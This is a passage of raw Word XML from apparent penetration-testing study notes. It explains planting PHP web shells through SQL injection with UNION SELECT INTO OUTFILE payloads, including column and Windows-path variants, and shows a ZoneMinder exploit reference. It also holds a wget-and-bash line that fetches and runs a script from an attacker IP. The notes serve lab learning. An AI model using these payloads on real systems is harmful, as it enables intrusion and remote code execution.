      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to interact with web shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="967"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cmd.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason why they used REQUEST instead of GET is because GET was blocked by the site. This was as seen in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId475">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hawat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup. And this writeup also shows us how to get reverse shell from the webshell. And only certain types of URL encoding worked for him, specifically only using </w:t>
      </w:r>
      <w:hyperlink r:id="rId476">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.url-encode-decode.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. URL encoding reverse shell taught here. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you wanted a classic GET php web shell, then just replace REQUEST with GET:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="846"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select '&lt;?php echo system($_GET["cmd"]); ?&gt;' into outfile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'/srv/http/cmd.php' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there were 2 columns in original SELECT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT '&lt;?php echo system($_REQUEST["cmd"]); ?&gt;',</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> INTO OUTFILE '/srv/http/cmd.php' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017AF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If there were 3 columns in original SELECT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="742"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT '&lt;?php echo system($_REQUEST["cmd"]); ?&gt;',</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL,NULL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> INTO OUTFILE '/srv/http/cmd.php' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you would have to change path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows pathing: double backslashes: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\\inetpub\\wwwroot\\cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They knew it was vulnerable to SQL injection since they had source code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="325" name="image325.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image325.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId477"/>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17BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See, no sanitization, so it was easy to inject SQL commands </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b36pa5tkbhhu" w:id="195"/>
      <w:bookmarkEnd w:id="195"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading web shell through sql injection (through command injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId478">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pebbles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we ran into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMS ZoneMinder v.1.29.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which had a SQL injection and other stuff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1430"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId479">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/41239</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But in the writeup above, they manually did the SQL injection. It was a blind SQL injection </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHICH WAS ALSO COMMAND INJECTION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. That is why there is no quote escaping at the start of the payload. But for most sql injections, it you will need a UNION-based payload to escape the first SELECT that is embedded into source code. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then they ran this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT "&lt;?php system($_GET['cmd']);?&gt;" INTO OUTFILE "/var/www/html/webshell.php"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They assumed the root directory was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but in general, if you have access to phpinfo.php, look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_SERVER['DOCUMENT_ROOT'] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for root directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId480">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">reddit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">post, they said that they transferred webshell as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget 192.168.45.232/bash.sh -O /tmp/bash.sh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then ran it:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash /tmp/bash.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
